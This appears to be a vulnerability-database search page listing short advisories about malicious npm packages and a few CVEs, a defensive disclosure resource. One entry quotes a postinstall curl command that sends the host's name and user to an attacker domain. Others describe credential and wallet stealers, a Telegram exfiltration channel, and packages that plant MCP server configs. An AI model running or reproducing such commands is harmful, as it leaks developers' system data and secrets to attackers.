Lucene search
K

32097 matches found

OSV
OSV
added 2026/06/13 9:10 p.m.13 views

MAL-2026-5750 Malicious code in mailconfirmer (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector dfb184ffa15fd011b84658a6b5cd68582e78827258a8373f0da1ef34248bfb09 The package advertises itself as an email-confirmation utility, but index.js contains only no-op stubs that console.log demo messages. The real...

5.6AI score
Exploits0References29
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/13 12:23 p.m.16 views

Malicious code in easy-time666 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 57bc31746af3bff6006bfe2da34cd0fb223a4bd9e867abddd172be5018821c22 package.json declares a postinstall hook that runs curl http://npm.wdf1.eyes.sh/pre?h=$hostname&u=&whoami over plain HTTP on every npm install, leaki...

5.9AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/11 7:16 a.m.11 views

Malicious code in 0x2ai-demo8 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector ecc8b825a6ca24f0ed99210734ea8d4f4fb7bf1bbdb3767b67417bf5cdb83257 On npm install, scripts/postinstall.cjs writes a .mcp.json into the installer's working directory that registers a stdio MCP server...

5.4AI score
Exploits0References1
OSV
OSV
added 2026/06/11 7:16 a.m.29 views

MAL-2026-5600 Malicious code in 0x2ai-multi-mq (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 7d056f067b0af2084bd7777fcdb2ae6e2c06bb67f40929ba9900b5aa9cb83649 When the documented invocation npx 0x2ai-multi-mq is run, bin/start.cjs copies chatroom-mcp-lite-patched.cjs and chatroom-monitor.cjs into the user's...

5.6AI score
Exploits0References1
OSV
OSV
added 2026/06/11 7:16 a.m.12 views

MAL-2026-5596 Malicious code in 0x2ai-demo8x (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f6d1ce2d7b8faa5bde122eb2bc6e0a79fec5f5720cfa7de0718a0c8948b344d6 On npm install, scripts/postinstall.cjs copies the package's payload/ tree into INITCWD the consumer's project root using fs.cpSync,...

5.5AI score
Exploits0References1
OSV
OSV
added 2026/06/11 6:49 a.m.11 views

MAL-2026-5615 Malicious code in sysau (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2b9246e768a775d54485e7208d0ed4fc575af09bc78c3fde95c5cb24ebc2350d Package advertises itself as a 'System binary configuration tool' but ships pointer.py spawned by index.js which hardcodes...

6AI score
Exploits0References2
Cvelist
Cvelist
added 2026/06/09 11:45 p.m.33 views

CVE-2026-46541 Nimiq network-libp2p: DHT query poisoning via first-record verification failure

Nimiq is a Rust implementation of the Nimiq Proof-of-Stake protocol based on the Albatross consensus algorithm. Prior to version 1.4.0, iIn handledhtget, the DhtResults accumulator is only initialized when the first DHT record passes verification. If the first record fails from a malicious DHT...

7.5CVSS0.00346EPSS
Exploits0References3
OSV
OSV
added 2026/06/09 8:34 p.m.9 views

MAL-2026-5480 Malicious code in mcp-server-notion (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 0423928197ec83ac273fa4a1b66d9e75398b956e7d5027014ff6326c552a46c2 Package occupies the unscoped name mcp-server-notion to catch misrouted installs of the scoped MCP Notion server. package.json declares "postinstall"...

5.5AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/09 8:18 p.m.11 views

Malicious code in db-dx-connector (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 074f9125a23bf19f9f20f101c2db4888d121e6bd931fcb9933ef0e4f899c3759 The package name db-dx-connector inverts the word order of the legitimate dx-db-connector package whose own GitHub URL...

6.1AI score
Exploits0References4
OSV
OSV
added 2026/06/09 6:3 p.m.12 views

MAL-2026-5461 Malicious code in fhirproxy-utils (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 405cf847121f4bfed32bc5679a40b64c1338b142af75823ef9583944a7ae7b5a On npm install via the prepare lifecycle hook and many other lifecycle aliases and on require, index.js performs broad reconnaissance and exfiltratio...

5.5AI score
Exploits0References1
OSV
OSV
added 2026/06/09 5:25 p.m.25 views

MAL-2026-5431 Malicious code in @webd-infra/query-designer-domain (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1c7713f23c6a0044172532693bc43aee0d785a980fc5c83ba1f773af9082e3b3 The package's package.json declares its only dependency ltidisafe as a direct tarball URL:...

5.8AI score
Exploits0References2
OSV
OSV
added 2026/06/09 7:55 a.m.10 views

MAL-2026-5357 Malicious code in farming-tools-12 (npm)

Crypto/SSH/wallet stealer, blockchain-helper-0 campaign sibling c960+, same aicrypto-xzggg publisher and "Core utilities for blockchain development" description as swap-sdk-87/defi-tools-39. postinstall auto-execs, src/index.js harvests /.ssh keys + Sol/Eth/BTC/Tron/Sui/Aptos wallets + .env +...

5.5AI score
Exploits0References1
OSV
OSV
added 2026/06/09 7:55 a.m.10 views

MAL-2026-5356 Malicious code in ethereum-kit-9 (npm)

Crypto/SSH/wallet stealer, blockchain-helper-0 campaign sibling c960+. postinstall auto-execs, src/index.js harvests /.ssh/idrsa+ided25519+Sol/Eth/BTC/Tron/Sui/Aptos wallets+.env+seeds, self-labels "CRYPTO STEALER", exfils to SAME Telegram bot 8227918239 chat 6433587894 not rotated. Campaign now...

5.7AI score
Exploits0References2
RedhatCVE
RedhatCVE
added 2026/06/05 7:16 p.m.10 views

CVE-2026-42156

Flowsint is an open-source OSINT graph exploration tool designed for cybersecurity investigation, transparency, and verification. Prior to 1.2.3, a remote attacker can create a node with a malicious type that can escape an existing Cypher query and an adversary can execute an arbitrary Cypher...

7.1CVSS5.7AI score0.00285EPSS
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/05 12:53 a.m.18 views

Malicious code in executable-stories-vitest (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d9900528338f5a1325fa66f8ebc1b72d1a24d63d708b42bbd5c54146ad7a6cbd No concrete installer-harm indicators were identified in this package version. No lifecycle-script behavior, network beacon, credential read, or...

6.1AI score
Exploits0References9
Snyk
Snyk
added 2026/06/01 9:0 p.m.11 views

Malicious Package

Overview ishowfeet16 is a malicious package. This package is part of a malicious npm campaign that abused the registry to distribute ad-supported web proxy applications disguised as educational websites. The package contains web assets intended to bypass network restrictions and generate...

9.8CVSS5.8AI score
Exploits0References2
Snyk
Snyk
added 2026/06/01 9:0 p.m.23 views

Malicious Package

Overview nottuff8 is a malicious package. This package is part of a malicious npm campaign that abused the registry to distribute ad-supported web proxy applications disguised as educational websites. The package contains web assets intended to bypass network restrictions and generate advertising...

9.8CVSS5.8AI score
Exploits0References2
Snyk
Snyk
added 2026/06/01 9:0 p.m.14 views

Malicious Package

Overview abuden226 is a malicious package. This package is part of a malicious npm campaign that abused the registry to distribute ad-supported web proxy applications disguised as educational websites. The package contains web assets intended to bypass network restrictions and generate advertisin...

9.8CVSS5.8AI score
Exploits0References2
Snyk
Snyk
added 2026/06/01 9:0 p.m.11 views

Malicious Package

Overview ishowfeet15 is a malicious package. This package is part of a malicious npm campaign that abused the registry to distribute ad-supported web proxy applications disguised as educational websites. The package contains web assets intended to bypass network restrictions and generate...

9.8CVSS5.8AI score
Exploits0References2
Snyk
Snyk
added 2026/06/01 9:0 p.m.24 views

Malicious Package

Overview ratelimitsucks6 is a malicious package. This package is part of a malicious npm campaign that abused the registry to distribute ad-supported web proxy applications disguised as educational websites. The package contains web assets intended to bypass network restrictions and generate...

9.8CVSS5.8AI score
Exploits0References2
Rows per page
Query Builder